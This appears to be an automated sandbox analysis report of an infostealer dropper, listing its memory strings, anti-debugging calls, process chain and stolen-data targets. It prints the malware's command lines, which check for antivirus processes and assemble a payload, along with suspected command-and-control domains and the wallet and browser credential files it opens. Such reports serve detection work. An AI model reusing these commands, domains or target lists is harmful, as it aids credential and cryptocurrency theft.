              Source: Dicks.pif, 00000017.00000002.3265878454.000000000112B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh[
              Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
              Source: Dicks.pif, 00000017.00000003.3264421996.0000000001173000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000002.3266103716.0000000001173000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3182152456.0000000001173000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3155264925.0000000001173000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3234780524.0000000001173000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
              Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
              Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
              Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
              Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
              Source: Dicks.pif, 00000017.00000003.3167767357.0000000003460000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
              Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
              Source: Dicks.pif, 00000013.00000003.3131838232.0000000002382000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000013.00000003.3062949485.0000000002375000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000013.00000003.3063600220.0000000002382000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000013.00000003.3063404315.0000000002382000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000013.00000003.3134985535.0000000002382000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000013.00000002.3141217970.0000000002382000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000013.00000003.3073308414.0000000002382000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
              Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
              Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
              Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
              Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
              Source: MSI53B9.tmp, 00000004.00000003.2491927351.0000000000F5A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
              Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
              Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
              Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
              Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
              Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
              Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
              Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
              Source: MSI53B9.tmp, 00000004.00000003.2491927351.0000000000F5A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\c(
              Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
              Source: Dicks.pif, 00000017.00000003.3180108390.000000000341E000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3196148648.000000000341E000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3182124941.000000000341A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 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
              Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
              Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
              Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
              Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
              Source: Dicks.pif, 00000017.00000003.3167767357.000000000345B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpAPI call chain: ExitProcess graph end nodegraph_4-23563
              Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleepgraph_19-98601
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_00E98990 LdrInitializeThunk,23_2_00E98990
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_000A45D5 BlockInput,19_2_000A45D5
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpCode function: 4_2_0088DA75 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0088DA75
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_00065CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,19_2_00065CAC
              Source: C:\Users\user\Desktop\SymposiumTaiwan.exeCode function: 8_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,8_2_00406328
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpCode function: 4_2_00894A5A mov eax, dword ptr fs:[00000030h]4_2_00894A5A
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpCode function: 4_2_00898AAA GetProcessHeap,4_2_00898AAA
              Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpCode function: 4_2_0088DA75 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0088DA75
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpCode function: 4_2_0088DBC3 SetUnhandledExceptionFilter,4_2_0088DBC3
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpCode function: 4_2_00895B53 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00895B53
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpCode function: 4_2_0088DD7C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0088DD7C
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_0005A354 SetUnhandledExceptionFilter,19_2_0005A354
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_0005A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_0005A385
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_0005A354 SetUnhandledExceptionFilter,23_2_0005A354
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_0005A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_0005A385

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifMemory written: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif base: E60000 value starts with: 4D5AJump to behavior
              Source: Dicks.pif, 00000013.00000003.3062971352.0000000004251000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: upknittsoappz.shop
              Source: Dicks.pif, 00000013.00000003.3131801499.00000000043FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: indexterityszcoxp.shop
              Source: Dicks.pif, 00000013.00000003.3131801499.00000000043FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: lariatedzugspd.shop
              Source: Dicks.pif, 00000013.00000003.3131801499.00000000043FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: callosallsaospz.shop
              Source: Dicks.pif, 00000013.00000003.3131801499.00000000043FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: outpointsozp.shop
              Source: Dicks.pif, 00000013.00000003.3131801499.00000000043FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: liernessfornicsa.shop
              Source: Dicks.pif, 00000013.00000003.3131801499.00000000043FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: shepherdlyopzc.shop
              Source: Dicks.pif, 00000013.00000003.3131801499.00000000043FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: unseaffarignsk.shop
              Source: Dicks.pif, 00000013.00000003.3131801499.00000000043FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: warrantelespsz.shop
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_00089369 LogonUserW,19_2_00089369
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_00045240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,19_2_00045240
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_00091AC6 SendInput,keybd_event,19_2_00091AC6
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_000951E2 mouse_event,19_2_000951E2
              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Users\user\AppData\Local\Temp\MSI53B9.tmp "C:\Users\user\AppData\Local\Temp\MSI53B9.tmp" -pqwerty2023 -s1Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpProcess created: C:\Users\user\Desktop\SymposiumTaiwan.exe "C:\Users\user\Desktop\SymposiumTaiwan.exe" Jump to behavior
              Source: C:\Users\user\Desktop\SymposiumTaiwan.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k copy Open Open.cmd & Open.cmd & exitJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe" Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 558563Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "cbsinchhavefcc" Basketball Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Upc + Beverages + Hero + Displaying + Version + Fm + Emotions 558563\kJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif 558563\Dicks.pif 558563\kJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 5Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifProcess created: C:\Users\user\AppData\Local\Temp\558563\Dicks.pif C:\Users\user\AppData\Local\Temp\558563\Dicks.pifJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_000888CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,19_2_000888CD
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_00094F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,19_2_00094F1C
              Source: Dicks.pif, 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmp, Dicks.pif, 00000017.00000003.3130701565.0000000002C6A000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif, 00000017.00000002.3265336651.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
              Source: Dicks.pifBinary or memory string: Shell_TrayWnd
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpCode function: 4_2_0088D8CB cpuid 4_2_0088D8CB
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpCode function: GetLocaleInfoW,GetNumberFormatW,4_2_0088932F
              Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpCode function: 4_2_0088C131 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,DeleteObject,CloseHandle,4_2_0088C131
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_00070722 GetUserNameW,19_2_00070722
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_0006416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,19_2_0006416A
              Source: C:\Users\user\AppData\Local\Temp\MSI53B9.tmpCode function: 4_2_0087A8E0 GetVersionExW,4_2_0087A8E0
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: Dicks.pif, 00000017.00000003.3234780524.0000000001159000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Dicks.pif PID: 3248, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Dicks.pif, 00000017.00000003.3156346560.00000000011C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s/Electrum-LTC
              Source: Dicks.pif, 00000017.00000003.3264421996.0000000001173000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
              Source: Dicks.pif, 00000017.00000003.3156346560.00000000011C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
              Source: Dicks.pif, 00000017.00000002.3265878454.0000000001159000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
              Source: Dicks.pif, 00000017.00000003.3182152456.0000000001173000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: Dicks.pif, 00000017.00000003.3264715151.00000000011CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
              Source: Dicks.pif, 00000017.00000003.3155264925.0000000001164000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance
              Source: Dicks.pif, 00000017.00000002.3265878454.0000000001159000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
              Source: Dicks.pif, 00000017.00000003.3156346560.00000000011C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: Dicks.pif, 00000017.00000003.3155264925.00000000011BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
